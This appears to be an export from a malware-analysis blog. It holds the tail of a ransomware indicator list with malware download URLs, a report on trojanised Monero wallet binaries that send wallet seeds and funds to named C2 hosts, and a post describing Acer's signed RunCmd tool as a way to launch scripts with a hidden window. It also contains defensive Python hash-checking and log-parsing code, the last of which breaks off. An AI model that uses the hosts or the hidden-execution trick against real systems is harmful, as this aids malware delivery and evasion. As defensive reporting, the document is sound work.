<tr><td>Mutex </td><td>5ss5c_CRYPT</td></tr>
<tr><td>Email </td><td>5ss5c@mail.ru</td></tr>
<tr><td>URL </td><td>http://58.221.158.90:88/car/down.txt</td></tr>
<tr><td>URL </td><td>http://58.221.158.90:88/car/c.dat</td></tr>
<tr><td>URL </td><td>http://58.221.158.90:88/car/cpt.dat</td></tr>
<tr><td>IP </td><td>58.221.158.90</td></tr>
<tr><td>IP </td><td>61.186.243.2 </td></tr>
<tr><td>Hash </td><td>82ed3f4eb05b76691b408512767198274e6e308e8d5230ada90611ca18af046d</td></tr>
<tr><td>Hash </td><td>dc3103fb21f674386b01e1122bb910a09f2226b1331dd549cbc346d8e70d02df</td></tr>
<tr><td>Hash </td><td>9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc</td></tr>
<tr><td>Hash </td><td>af041f6ac90b07927696bc61e08a31a210e265a997a62cf732f7d3f5c102f1da</td></tr>
<tr><td>Hash </td><td>ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c</td></tr>
<tr><td>Hash </td><td>e685aafc201f851a47bc926dd39fb12f4bc920f310200869ce0716c41ad92198</td></tr>
<tr><td>Hash </td><td>e5bb194413170d111685da51b58d2fd60483fc7bebc70b1c6cb909ef6c6dd4a9</td></tr>
<tr><td>Hash </td><td>ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f</td></tr>
<tr><td>Hash </td><td>ef90dcc647e50c2378122f92fba4261f6eaa24b029cfa444289198fb0203e067</td></tr>
<tr><td>Hash </td><td>47fa9c298b904d66a5eb92c67dee602198259d366ef4f078a8365beefb9fdc95</td></tr>
<tr><td>Hash </td><td>68e644aac112fe3bbf4e87858f58c75426fd5fda93f194482af1721bc47f1cd7</td></tr>
<tr><td>Hash </td><td>ea7caa08e115dbb438e29da46b47f54c62c29697617bae44464a9b63d9bddf18</td></tr>
<tr><td>Hash </td><td>23205bf9c36bbd56189e3f430c25db2a27eb089906b173601cd42c66a25829a7</td></tr>
<tr><td>Hash </td><td>a46481cdb4a9fc1dbdcccc49c3deadbf18c7b9f274a0eb5fdf73766a03f19a7f</td></tr>
<tr><td>Hash </td><td>cf33a92a05ba3c807447a5f6b7e45577ed53174699241da360876d4f4a2eb2de</td></tr>
<tr><td>Hash </td><td>8e348105cde49cad8bfbe0acca0da67990289e108799c88805023888ead74300</td></tr>
<tr><td>Hash </td><td>ad3c0b153d5b5ba4627daa89cd2adbb18ee5831cb67feeb7394c51ebc1660f41</td></tr>
<tr><td>Hash </td><td>de3c5fc97aecb93890b5432b389e047f460b271963fe965a3f26cb1b978f0eac</td></tr>
<tr><td>Hash </td><td>bd291522025110f58a4493fad0395baec913bd46b1d3fa98f1f309ce3d02f179</td></tr>
<tr><td>Hash </td><td>75d543aaf9583b78de645f13e0efd8f826ff7bcf17ea680ca97a3cf9d552fc1f</td></tr>
<tr><td>Hash </td><td>50e771386ae200b46a26947665fc72a2a330add348a3c75529f6883df48c2e39</td></tr>
<tr><td>Hash </td><td>0aa4b54e9671cb83433550f1d7950d3453ba8b52d8546c9f3faf115fa9baad7e</td></tr>
<tr><td>Hash </td><td>5d12b1fc6627b0a0df0680d6556e782b8ae9270135457a81fe4edbbccc0f3552</td></tr>
</tbody></table>
<br />
<br />
These indicators are also available on AlienVault OTX:<br />
<a href="https://otx.alienvault.com/pulse/5e1e45cddcc6457fa4ce6c5a" target="_blank">Satan ransomware rebrands as 5ss5c ransomware</a><br />
<br />
<b>MITRE ATT&CK techniques</b><br />
<div>
<br /></div>
<div>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1210/" target="_blank">T1210 - Exploitation of Remote Services</a></li>
<li><a href="https://attack.mitre.org/techniques/T1003/" target="_blank">T1003 - Credential Dumping</a></li>
<li><a href="https://attack.mitre.org/techniques/T1486/" target="_blank">T1486 - Data Encrypted for Impact</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/" target="_blank">T1105 - Remote File Copy</a></li>
<li><a href="https://attack.mitre.org/techniques/T1027/" target="_blank">T1027 - Obfuscated Files or Information</a></li>
<li><a href="https://attack.mitre.org/software/S0002/" target="_blank">S0002 - Mimikatz</a></li>
</ul>
</div>
<br />
<br /></div>
</div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-91970133338435517672019-11-19T23:18:00.001+01:002019-11-22T10:49:13.911+01:00Monero download site and binaries compromised<div>
<br />
<b><span style="font-size: large;">Introduction</span></b><br />
<br /></div>
<div>
Earlier this evening I saw a tweet appear which claimed Monero had been hacked and a malicious binary (instead of the real one) had been served:</div>
<div>
<br /></div>
<div>
<blockquote class="twitter-tweet">
<div dir="ltr" lang="en">
Warning Monero users: If you downloaded Monero in the past 24 hours you may have installed malware. Monero's official website served compromised binaries for at least 30 minutes during the past 24 hours. Investigations are ongoing. <a href="https://t.co/geqA4dIPar">https://t.co/geqA4dIPar</a></div>
— dark.fail (@DarkDotFail) <a href="https://twitter.com/DarkDotFail/status/1196668999519657984?ref_src=twsrc%5Etfw">November 19, 2019</a></blockquote>
</div>
<div>
<br /></div>
<div>
Post on Reddit:<br />
<a href="https://www.reddit.com/r/Monero/comments/dyfozs/security_warning_cli_binaries_available_on/" target="_blank">https://www.reddit.com/r/Monero/comments/dyfozs/security_warning_cli_binaries_available_on/</a><br />
<br />
Github issue:<br />
<a href="https://github.com/monero-project/monero/issues/6151" target="_blank">https://github.com/monero-project/monero/issues/6151</a><br />
<br />
<br />
<b><span style="font-size: large;">Linux binary</span></b><br />
<br />
Thanks to user <i>nikitasius </i>I was able to retrieve the malicious binary:<br />
<a href="https://github.com/monero-project/monero/issues/6151#issuecomment-555511805" target="_blank">https://github.com/monero-project/monero/issues/6151#issuecomment-555511805</a><br />
<br />
This binary is an ELF file with the following properties:<br />
<ul>
<li>MD5: d267be7efc3f2c4dde8e90b9b489ed2a</li>
<li>SHA-1: 394bde8bb86d75eaeee69e00d96d8daf70df4b0a</li>
<li>SHA-256: 7ab9afbc5f9a1df687558d570192fbfe9e085712657d2cfa5524f2c8caccca31</li>
<li>File type: ELF</li>
<li>Magic: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 3.2.0, from 'x)', not stripped</li>
<li>File size: 27.63 MB (28967688 bytes)</li>
<li>VirusTotal report: <a href="https://www.virustotal.com/gui/file/7ab9afbc5f9a1df687558d570192fbfe9e085712657d2cfa5524f2c8caccca31/summary" target="_blank">https://www.virustotal.com/gui/file/7ab9afbc5f9a1df687558d570192fbfe9e085712657d2cfa5524f2c8caccca31/summary</a></li>
</ul>
<div>
When comparing the legitimate file and this ELF file, we notice the file size is different, and a few new functions have been added:</div>
<div>
<br /></div>
<div>
<b>cryptonote::simple_wallet::send_seed</b></div>
<div>
<b><br /></b></div>
<div>
This function is called immediately after opening or creating a new wallet, as can be seen in Figures 1 and 2 below.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-XHNEOBK6e7k/XdRcYIFLrKI/AAAAAAAACQg/LZPntlADAIYAlM_oSaenYzbA7U0fa4QyQCLcBGAsYHQ/s1600/create_wallet.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="312" data-original-width="720" height="172" src="https://1.bp.blogspot.com/-XHNEOBK6e7k/XdRcYIFLrKI/AAAAAAAACQg/LZPntlADAIYAlM_oSaenYzbA7U0fa4QyQCLcBGAsYHQ/s400/create_wallet.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Create wallet (legitimate)</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-vJ1q_yGPD5s/XdRcYARrHeI/AAAAAAAACQk/HjcObVCjKzIdNq6fWtxLjyWS0QcmKXqwwCLcBGAsYHQ/s1600/seed.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="652" data-original-width="1600" height="162" src="https://1.bp.blogspot.com/-vJ1q_yGPD5s/XdRcYARrHeI/AAAAAAAACQk/HjcObVCjKzIdNq6fWtxLjyWS0QcmKXqwwCLcBGAsYHQ/s400/seed.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Call new seed function</td></tr>
</tbody></table>
<div style="clear: both;"></div>
The seed will be sent to: node.hashmonero[.]com.<br />
<br />
<b>cryptonote::simple_wallet::send_to_cc</b><br />
<br />
As you may have guessed, this function sends data off to the CC or C2 (command and control) server - in this case, the stolen funds.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-md4Kntj_F9Q/XdRgmp8vKrI/AAAAAAAACQ8/smW9J4qlWGI425t6jZvhJHLqYIEhGOgZQCLcBGAsYHQ/s1600/sendtocc.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="151" data-original-width="737" height="81" src="https://1.bp.blogspot.com/-md4Kntj_F9Q/XdRgmp8vKrI/AAAAAAAACQ8/smW9J4qlWGI425t6jZvhJHLqYIEhGOgZQCLcBGAsYHQ/s400/sendtocc.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Send to cc</td></tr>
</tbody></table>
<div style="clear: both;"></div>
Sending funds to the C2 is handled using an HTTP POST request to the following C2 servers:<br />
<br />
<ul>
<li>node.xmrsupport[.]co</li>
<li>45.9.148[.]65</li>
</ul>
<br />
As far as I can see, it does not create any additional files or folders - it simply steals your seed and attempts to exfiltrate funds from your wallet.<br />
<br />
<b><span style="font-size: large;">Windows binary</span></b><br />
<br />
The C2 server 45.9.148[.]65 also hosts a Windows binary with the following properties:<br />
<br />
<ul>
<li>MD5: 72417ab40b8ed359a37b72ac8d399bd7</li>
<li>SHA-1: 6bd94803b3487ae1997238614c6c81a0f18bcbb0</li>
<li>SHA-256: 963c1dfc86ff0e40cee176986ef9f2ce24fda53936c16f226c7387e1a3d67f74</li>
<li>File type: Win32 EXE</li>
<li>Magic: PE32+ executable for MS Windows (console) Mono/.Net assembly</li>
<li>File size: 65.14 MB (68302960 bytes)</li>
<li>VirusTotal report: <a href="https://www.virustotal.com/gui/file/963c1dfc86ff0e40cee176986ef9f2ce24fda53936c16f226c7387e1a3d67f74/summary" target="_blank">https://www.virustotal.com/gui/file/963c1dfc86ff0e40cee176986ef9f2ce24fda53936c16f226c7387e1a3d67f74/summary</a></li>
</ul>
<br />
The Windows version does essentially the same things as the Linux version - stealing your seed and wallet funds. The functions are the same as well; in this build they just appear under their mangled names, e.g. <b>_ZN10cryptonote13simple_wallet9send_seedERKN4epee15wipeable_stringE</b>, which demangles to <i>cryptonote::simple_wallet::send_seed(epee::wipeable_string const&amp;)</i>.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xsAa0ktat4c/XdRjsnm78aI/AAAAAAAACRI/0jhOY6UrmvwJ8WAQfVS0JMH1HOBoWvpqACLcBGAsYHQ/s1600/seed-win.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="177" data-original-width="664" height="106" src="https://1.bp.blogspot.com/-xsAa0ktat4c/XdRjsnm78aI/AAAAAAAACRI/0jhOY6UrmvwJ8WAQfVS0JMH1HOBoWvpqACLcBGAsYHQ/s400/seed-win.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Send to cc</td></tr>
</tbody></table>
<div style="clear: both;"></div>
<b>Note</b>: this doesn’t mean the official Windows binary was also compromised - it simply means there’s also a compromised Windows binary out there. Only the Monero team can confirm if other binaries (besides the Linux one mentioned in this blog) have been compromised.<br />
<br />
<b><span style="font-size: large;">Detection</span></b><br />
<br />
<ul>
<li>If you have a firewall or proxy, whether hardware or software, verify whether you had any network traffic or connections to:</li>
<ul>
<li>node.hashmonero[.]com</li>
<li>node.xmrsupport[.]co</li>
<li>45.9.148[.]65</li>
<li>91.210.104[.]245</li>
</ul>
<li>Remove all the binaries listed in this blog post;</li>
<li>Verify the hashes of your Monero setup or installer file. Guides on how to do that:</li>
<ul>
<li>Beginner: <a href="https://src.getmonero.org/resources/user-guides/verification-windows-beginner.html" target="_blank">https://src.getmonero.org/resources/user-guides/verification-windows-beginner.html</a></li>
<li>Advanced: <a href="https://src.getmonero.org/resources/user-guides/verification-allos-advanced.html" target="_blank">https://src.getmonero.org/resources/user-guides/verification-allos-advanced.html</a></li>
<li>Note: hashes list is available here: <a href="https://web.getmonero.org/downloads/hashes.txt" target="_blank">https://web.getmonero.org/downloads/hashes.txt</a>.</li>
</ul>
</ul>
<div>
<b>Note</b>: What is a hash? A hash is a (practically) unique identifier computed from data, such as a file, a word, ... Prefer SHA256 hashes for file integrity checks, as it is the more secure option.</div>
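As an added example (not code from this post or from the Monero project), a small Python check that computes a download's hashes, compares the SHA256 against the value you copied from the official hashes list, and flags a match against any of the compromised hashes in the Indicators table further down; the sample input is constructed.

```python
import hashlib

# Hashes of the compromised binaries, copied from the Indicators table in this post.
KNOWN_BAD = {
    "sha256": {
        "7ab9afbc5f9a1df687558d570192fbfe9e085712657d2cfa5524f2c8caccca31",
        "963c1dfc86ff0e40cee176986ef9f2ce24fda53936c16f226c7387e1a3d67f74",
    },
    "md5": {
        "d267be7efc3f2c4dde8e90b9b489ed2a",
        "72417ab40b8ed359a37b72ac8d399bd7",
    },
    "sha1": {
        "6bd94803b3487ae1997238614c6c81a0f18bcbb0",
        "394bde8bb86d75eaeee69e00d96d8daf70df4b0a",
    },
}

ALGOS = ("md5", "sha1", "sha256")


def hash_bytes(data):
    """Compute md5, sha1 and sha256 of an in-memory blob in one pass."""
    digests = {name: hashlib.new(name) for name in ALGOS}
    for obj in digests.values():
        obj.update(data)
    return {name: obj.hexdigest() for name, obj in digests.items()}


def classify(hashes, expected_sha256):
    """
    'compromised' if any digest is a known-bad one (checked first, so a bad file
    is never reported as merely 'mismatch'), 'verified' if the SHA256 equals the
    published value, otherwise 'mismatch' (wrong or corrupted download).
    """
    for algo, bad in KNOWN_BAD.items():
        if hashes.get(algo, "").lower() in bad:
            return "compromised"
    if hashes["sha256"].lower() == expected_sha256.strip().lower():
        return "verified"
    return "mismatch"


def verify_download(data, expected_sha256):
    """Classify an in-memory download and return its digests alongside the verdict."""
    hashes = hash_bytes(data)
    return {"status": classify(hashes, expected_sha256), **hashes}


def verify_file(path, expected_sha256, chunk_size=1 << 20):
    """Same check for a file on disk, read in chunks so large installers fit in memory."""
    digests = {name: hashlib.new(name) for name in ALGOS}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for obj in digests.values():
                obj.update(chunk)
    hashes = {name: obj.hexdigest() for name, obj in digests.items()}
    return {"status": classify(hashes, expected_sha256), **hashes}


if __name__ == "__main__":
    # Constructed sample, not a real Monero binary.
    sample = b"constructed installer content"
    published = hash_bytes(sample)["sha256"]  # stands in for the value from hashes.txt
    print(verify_download(sample, published)["status"])   # verified
    print(verify_download(sample, "00" * 32)["status"])   # mismatch
```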
<div>
<br /></div>
<div>
You may also use the following Yara rule to detect the malicious or compromised binaries:</div>
<div>
<a href="https://gist.github.com/bartblaze/5578998ed706349d14008a2428428dc6" target="_blank">Monero_Compromise.yar</a><br />
Download Yara (and documentation) from:<br />
<a href="https://github.com/VirusTotal/yara" target="_blank">https://github.com/VirusTotal/yara</a></div>
<div>
<br />
There's an additional analysis by <i>SerHack </i>here:<br />
<a href="https://serhack.me/articles/cli-binaries-compromised-monero-analysis/">https://serhack.me/articles/cli-binaries-compromised-monero-analysis/</a></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Recommendations</span></b></div>
<ul>
<li>Install an antivirus, and if possible, use a firewall (free or paid is of less importance);</li>
<li>If you already use an antivirus: it may be a good idea to not exclude a specific folder in your antivirus when using Monero (or other miners), and if needed, only do so <b>after</b> the hashes have been verified;</li>
<li>Restore your seed or account;</li>
<ul>
<li>How to restore your account: <a href="https://web.getmonero.org/resources/user-guides/restore_account.html" target="_blank">https://web.getmonero.org/resources/user-guides/restore_account.html</a></li>
<li>Recovering wallet using the mnemonic seed: <a href="https://monero.stackexchange.com/questions/10/how-can-i-recover-a-wallet-using-the-mnemonic-seed" target="_blank">https://monero.stackexchange.com/questions/10/how-can-i-recover-a-wallet-using-the-mnemonic-seed</a></li>
</ul>
<li>Monitor your account/wallet for the next days and verify there have been no fraudulent transactions. Contact the Monero team for support.</li>
</ul>
<div>
<b>Note</b>: Especially go through the steps if at any point you downloaded, used or installed new binaries between these dates: Monday 18th 1:30 AM UTC and 5:30 PM UTC. Download the latest version from: <a href="https://web.getmonero.org/downloads/" target="_blank">https://web.getmonero.org/downloads/</a>.<br />
<br />
<b><span style="font-size: large;">Monero team statement</span></b></div>
<div>
<br />
The Monero team has issued a statement as follows:<br />
<br />
Warning: The binaries of the CLI wallet were compromised for a short time:</div>
<div>
<a href="https://web.getmonero.org/2019/11/19/warning-compromised-binaries.html" target="_blank">https://web.getmonero.org/2019/11/19/warning-compromised-binaries.html</a><br />
<br />
I expect this statement to be updated the following days, so monitor it as well.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
Monero is not the first, nor will it likely be the last cryptocurrency (in this case, its website and binaries) that gets compromised.<br />
<br />
Follow the steps in this blog post to protect yourself and always watch your online accounts closely, especially those in which you have invested financially. Use strong passwords, use MFA (or 2FA) where possible and always be vigilant. Verify hashes whenever a new version is available.<br />
<br />
Note: this blog post is not intended to be a full analysis, but rather a quick report on the facts, including recommendations. Questions or feedback? Happy to hear it!<br />
<br />
Let me know in the comments below or on <a href="https://twitter.com/bartblaze/" target="_blank">Twitter</a>.<br />
<br />
<br /></div>
<div>
<br /></div>
<div>
<b>Indicators</b></div>
<br />
<style type="text/css">
table.tableizer-table {
font-size: 12px;
border: 1px solid #CCC;
font-family: Arial, Helvetica, sans-serif;
}
.tableizer-table td {
padding: 4px;
margin: 3px;
border: 1px solid #CCC;
}
.tableizer-table th {
background-color: #2F8B49;
color: #FFF;
font-weight: bold;
}
</style>
<br />
<table class="tableizer-table">
<thead>
<tr class="tableizer-firstrow"><th>Indicator type</th><th>Indicator</th></tr>
</thead><tbody>
<tr><td>FileHash-SHA256</td><td>7ab9afbc5f9a1df687558d570192fbfe9e085712657d2cfa5524f2c8caccca31</td></tr>
<tr><td>FileHash-SHA256</td><td>963c1dfc86ff0e40cee176986ef9f2ce24fda53936c16f226c7387e1a3d67f74</td></tr>
<tr><td>hostname</td><td>www.hashmonero.com</td></tr>
<tr><td>hostname</td><td>node.xmrsupport.co</td></tr>
<tr><td>hostname</td><td>node.hashmonero.com</td></tr>
<tr><td>FileHash-MD5</td><td>d267be7efc3f2c4dde8e90b9b489ed2a</td></tr>
<tr><td>FileHash-MD5</td><td>72417ab40b8ed359a37b72ac8d399bd7</td></tr>
<tr><td>FileHash-SHA1</td><td>6bd94803b3487ae1997238614c6c81a0f18bcbb0</td></tr>
<tr><td>FileHash-SHA1</td><td>394bde8bb86d75eaeee69e00d96d8daf70df4b0a</td></tr>
<tr><td>IPv4</td><td>91.210.104.245</td></tr>
<tr><td>IPv4</td><td>45.9.148.65</td></tr>
<tr><td>domain</td><td>hashmonero.com</td></tr>
<tr><td>domain</td><td>xmrsupport.co</td></tr>
</tbody></table>
<br />
On AlienVault:<br />
<br />
<a href="https://otx.alienvault.com/pulse/5dd4574fc7c82cddbdcb8d12" target="_blank">https://otx.alienvault.com/pulse/5dd4574fc7c82cddbdcb8d12</a><br />
<br />
<b>MITRE ATT&CK techniques</b><br />
<b><br /></b>
<a href="https://attack.mitre.org/techniques/T1195/" target="_blank">ID: T1195 - Supply Chain Compromise</a><br />
<a href="https://attack.mitre.org/techniques/T1199/" target="_blank">ID: T1199 - Trusted Relationship</a><br />
<br />
</div>
</div>
Bart (http://www.blogger.com/profile/18326761248866196755)<br />
<br />
<b style="font-size: x-large;">Run applications and scripts using Acer's RunCmd</b><br />
Published 2019-03-17T22:17:00+01:00, updated 2019-03-18T10:51:25+01:00<br />
This weekend I was cleaning up an old Acer laptop of mine and discovered a hidden folder on the root drive, <b>C:\OEM</b>.<br />
<br />
Inside's a bunch of interesting files, one of these is a tool called <b>RunCmd_X64.exe</b>.<br />
<br />
The file is a legitimate and signed binary by Acer:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-lnm4B6kgKk0/XI6xFzeBkLI/AAAAAAAACLY/bByQ8QKKJpkAJYE0DkKzjGP8c2S5SDRTwCLcBGAs/s1600/acersig.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="637" data-original-width="421" height="320" src="https://2.bp.blogspot.com/-lnm4B6kgKk0/XI6xFzeBkLI/AAAAAAAACLY/bByQ8QKKJpkAJYE0DkKzjGP8c2S5SDRTwCLcBGAs/s320/acersig.PNG" width="211" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Signed RunCmd_X64</td></tr>
</tbody></table>
The tool contains a useful help file as follows:<br />
<br />
<blockquote class="tr_bq">
A tool to execute a command file.<br />
RunCmd.exe filepath [/T | /F]<br />
<span style="white-space: pre;"> </span> filepath <span style="white-space: pre;"> </span> full path name or file name<br />
<span style="white-space: pre;"> </span> /T <span style="white-space: pre;"> </span> launch command file and open the console window<br />
<span style="white-space: pre;"> </span> /F <span style="white-space: pre;"> </span> launch command file and hide the console window<br />
If there is not any flag, /T or /F, the default situation is hiding window<br />
Examples:<br />
<span style="white-space: pre;"> </span> RunCmd.exe "D:\EnBT.cmd" /T<br />
<span style="white-space: pre;"> </span> RunCmd.exe "EnBT.cmd" /F</blockquote>
<br />
Simply put, you can use Acer's tool as an alternative to the built-in command prompt, and to launch other applications! Additionally, using the <b>/F</b> parameter or flag will hide the console window, which is also the default behaviour when no parameter is given at all!<br />
<br />
Some simple examples:<br />
<br />
<b>Run an application directly</b><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-nENZxK9eLX8/XI60qxsmNFI/AAAAAAAACLo/oTv18my8CJg5ZzAxMHlTFkMscZHMFDc-ACLcBGAs/s1600/acercalc1.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="460" data-original-width="956" height="191" src="https://1.bp.blogspot.com/-nENZxK9eLX8/XI60qxsmNFI/AAAAAAAACLo/oTv18my8CJg5ZzAxMHlTFkMscZHMFDc-ACLcBGAs/s400/acercalc1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Running calc.exe</td></tr>
</tbody></table>
<b>Run virtually anything using a script </b><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-lWc4T3Mjlww/XI60q2T2IXI/AAAAAAAACLk/XXCycWDJWaAZB1MgPKR4SgMOIF9t_VfIwCLcBGAs/s1600/acercalc2.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="326" data-original-width="956" height="136" src="https://2.bp.blogspot.com/-lWc4T3Mjlww/XI60q2T2IXI/AAAAAAAACLk/XXCycWDJWaAZB1MgPKR4SgMOIF9t_VfIwCLcBGAs/s400/acercalc2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Running calc using a batch file</td></tr>
</tbody></table>
Note that since no parameter is used, the RunCmd tool will run silently and tools such as Process Explorer show a non-existent parent process.<br />
<br />
In theory, you can run any script or scriptlet using Acer's tool to execute "command files" :)<br />
<br />
<b>For attackers</b><br />
<br />
This "LOLBin" (or at the least, a legitimate and signed binary that can be reused for malicious purposes) has the following MD5 hash:<br />
<br />
<b>RunCmd_X64 - d71fb1b03bf84fae29af9b2dc525ba33</b><br />
<br />
There is also a 32-bit version, however, this binary is not signed.<br />
<br />
<b>RunCmd - 4d50588568cae95331f00cbdb52be37a</b><br />
<br />
<br />
<b>For defenders</b><br />
<br />
See "For attackers". Additionally, the RunCmd tool will attempt to create a folder named "<b>RunCmdLog" </b>to store logfiles. An example logfile is as follows:<br />
<blockquote class="tr_bq">
<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>TRACE<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>ENTER: main<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>TRACE<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>EXIT: main<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>INFO<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>Para 1: calc.bat<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>INFO<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>Para 2:<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>INFO<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>command: C:\Tools\Acer\calc.bat<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>INFO<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>command success</blockquote>
Log files will have the following format:<br />
%s%02d-%02d-%02d %02d-%02d-%02d.log<br />
<br />
Where %s is RunCmd and the %02d fields are the date and time of execution. For the example log above, this gives:<br />
RunCmd2019-03-17 21-00-37.log<br />
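An added example, not part of the original post: a Python parser for these RunCmdLog files that extracts which command file was launched, whether a /T flag was passed (otherwise the console window was hidden) and whether it ran from somewhere other than the vendor folder. The C:\OEM\ allow-list and the sample log are assumptions modelled on the excerpt above.

```python
import re
from datetime import datetime

# Constructed sample, modelled on the RunCmdLog excerpt in the post. Fields are
# tab-separated: timestamp, [thread id], level, logger, message.
SAMPLE_LOG = (
    "2019-03-17 21:00:37\t[ 193C]\tTRACE\tmain -\tENTER: main\n"
    "2019-03-17 21:00:37\t[ 193C]\tTRACE\tmain -\tEXIT: main\n"
    "2019-03-17 21:00:37\t[ 193C]\tINFO\tmain -\tPara 1: calc.bat\n"
    "2019-03-17 21:00:37\t[ 193C]\tINFO\tmain -\tPara 2:\n"
    "2019-03-17 21:00:37\t[ 193C]\tINFO\tmain -\tcommand: C:\\Tools\\Acer\\calc.bat\n"
    "2019-03-17 21:00:37\t[ 193C]\tINFO\tmain -\tcommand success\n"
)

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\t"
    r"\[\s*(?P<tid>[0-9A-Fa-f]+)\]\t"
    r"(?P<level>[A-Z]+)\t"
    r"(?P<logger>[^\t]+)\t"
    r"(?P<msg>.*)$"
)

# File name layout from the post: %s%02d-%02d-%02d %02d-%02d-%02d.log with %s == "RunCmd",
# e.g. "RunCmd2019-03-17 21-00-37.log".
FILENAME_RE = re.compile(r"RunCmd(\d{4}-\d{2}-\d{2}) (\d{2})-(\d{2})-(\d{2})\.log")

# Assumption (not from the post): command files a vendor tool is expected to run
# live under the OEM folder the tool itself ships in.
EXPECTED_DIRS = ("C:\\OEM\\",)


def parse_log_filename(name):
    """Return the execution time encoded in a RunCmdLog file name, or None."""
    m = FILENAME_RE.fullmatch(name)
    if not m:
        return None
    date, hh, mm, ss = m.groups()
    return datetime.strptime(f"{date} {hh}:{mm}:{ss}", "%Y-%m-%d %H:%M:%S")


def parse_log(text):
    """Split RunCmdLog lines into dicts; lines that do not fit the layout are skipped."""
    return [m.groupdict() for m in map(LINE_RE.match, text.splitlines()) if m]


def executed_commands(text):
    """One record per launched command file: resolved path, parameters given, success."""
    runs, params = [], []
    for ev in parse_log(text):
        msg = ev["msg"]
        if msg.startswith("Para "):          # "Para 1: calc.bat", "Para 2:" (empty)
            value = msg.split(":", 1)[1].strip()
            if value:
                params.append(value)
        elif msg.startswith("command: "):    # full path the tool resolved and ran
            runs.append({"ts": ev["ts"], "tid": ev["tid"],
                         "command": msg[len("command: "):],
                         "params": params, "success": False})
            params = []
        elif msg == "command success" and runs:
            runs[-1]["success"] = True
    return runs


def suspicious_runs(text, expected_dirs=EXPECTED_DIRS):
    """Flag runs outside the expected folder or without /T (console window hidden)."""
    flagged = []
    for run in executed_commands(text):
        cmd = run["command"].lower()
        in_expected = any(cmd.startswith(d.lower()) for d in expected_dirs)
        hidden = "/T" not in [p.upper() for p in run["params"]]
        if not in_expected or hidden:
            flagged.append(dict(run, outside_expected_dir=not in_expected,
                                hidden_window=hidden))
    return flagged


if __name__ == "__main__":
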